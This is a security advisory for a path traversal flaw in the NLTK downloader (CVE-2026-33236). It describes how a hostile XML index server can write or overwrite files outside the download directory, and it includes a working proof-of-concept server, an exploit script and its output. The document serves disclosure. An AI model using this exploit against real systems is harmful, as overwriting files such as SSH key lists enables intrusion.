PT-2026-26300 · Pypi · Nltk
Published
2026-03-19
·
Updated
2026-03-19
·
CVE-2026-33236
CVSS v3.1
8.1
High
| AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H |
Vulnerability Description
The NLTK downloader does not validate the
subdir and id attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as ../), which can lead to:- Arbitrary Directory Creation: Create directories at arbitrary locations in the file system
- Arbitrary File Creation: Create arbitrary files
- Arbitrary File Overwrite: Overwrite critical system files (such as
/etc/passwd,~/.ssh/authorized keys, etc.)
Vulnerability Principle
Key Code Locations
1. XML Parsing Without Validation (
nltk/downloader.py:253)self.filename = os.path.join(subdir, id + ext)
subdirandidare directly from XML attributes without any validation
2. Path Construction Without Checks (
nltk/downloader.py:679)filepath = os.path.join(download dir, info.filename)
- Directly uses
filenamewhich may contain path traversal
3. Unrestricted Directory Creation (
nltk/downloader.py:687)os.makedirs(os.path.join(download dir, info.subdir), exist ok=True)
- Can create arbitrary directories outside the download directory
4. File Writing Without Protection (
nltk/downloader.py:695)with open(filepath, "wb") as outfile:
- Can write to arbitrary locations in the file system
Attack Chain
1. Attacker controls remote XML index server
↓
2. Provides malicious XML: <package id="passwd" subdir="../../etc" .../>
↓
3. Victim executes: downloader.download('passwd')
↓
4. Package.fromxml() creates object, filename = "../../etc/passwd.zip"
↓
5. download package() constructs path: download dir + "../../etc/passwd.zip"
↓
6. os.makedirs() creates directory: download dir + "../../etc"
↓
7. open(filepath, "wb") writes file to /etc/passwd.zip
↓
8. System file is overwritten!
Impact Scope
- System File Overwrite
Reproduction Steps
Environment Setup
- Install NLTK
pip install nltk
- Prepare malicious server and exploit script (see PoC section)
Reproduction Process
Step 1: Start malicious server
python3 malicious server.py
Step 2: Run exploit script
python3 exploit vulnerability.py
Step 3: Verify results
ls -la /tmp/test file.zip
Proof of Concept
Malicious Server (malicious server.py)
#!/usr/bin/env python3
"""Malicious HTTP Server - Provides XML index with path traversal"""
import os
import tempfile
import zipfile
from http.server import HTTPServer, BaseHTTPRequestHandler
# Create temporary directory
server dir = tempfile.mkdtemp(prefix="nltk malicious ")
# Create malicious XML (contains path traversal)
malicious xml = """<?xml version="1.0"?>
<nltk data>
<packages>
<package id="test file" subdir="../../../../../../../../../tmp"
url="http://127.0.0.1:8888/test.zip"
size="100" unzipped size="100" unzip="0"/>
</packages>
</nltk data>
"""
# Save files
with open(os.path.join(server dir, "malicious index.xml"), "w") as f:
f.write(malicious xml)
with zipfile.ZipFile(os.path.join(server dir, "test.zip"), "w") as zf:
zf.writestr("test.txt", "Path traversal attack!")
# HTTP Handler
class Handler(BaseHTTPRequestHandler):
def do GET(self):
if self.path == '/malicious index.xml':
self.send response(200)
self.send header('Content-type', 'application/xml')
self.end headers()
with open(os.path.join(server dir, 'malicious index.xml'), 'rb') as f:
self.wfile.write(f.read())
elif self.path == '/test.zip':
self.send response(200)
self.send header('Content-type', 'application/zip')
self.end headers()
with open(os.path.join(server dir, 'test.zip'), 'rb') as f:
self.wfile.write(f.read())
else:
self.send response(404)
self.end headers()
def log message(self, format, *args):
pass
# Start server
if name == " main ":
port = 8888
server = HTTPServer(("0.0.0.0", port), Handler)
print(f"Malicious server started: http://127.0.0.1:{port}/malicious index.xml")
print("Press Ctrl+C to stop")
try:
server.serve forever()
except KeyboardInterrupt:
print("
Server stopped")
Exploit Script (exploit vulnerability.py)
#!/usr/bin/env python3
"""AFO Vulnerability Exploit Script"""
import os
import tempfile
def exploit(server url="http://127.0.0.1:8888/malicious index.xml"):
download dir = tempfile.mkdtemp(prefix="nltk exploit ")
print(f"Download directory: {download dir}")
# Exploit vulnerability
from nltk.downloader import Downloader
downloader = Downloader(server index url=server url, download dir=download dir)
downloader.download("test file", quiet=True)
# Check results
expected path = "/tmp/test file.zip"
if os.path.exists(expected path):
print(f"
✗ Exploit successful! File written to: {expected path}")
print(f"✗ Path traversal attack successful!")
else:
print(f"
? File not found, download may have failed")
if name == " main ":
exploit()
Execution Results
✗ Exploit successful! File written to: /tmp/test file.zip
✗ Path traversal attack successful!Fix
Path traversal
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Nltk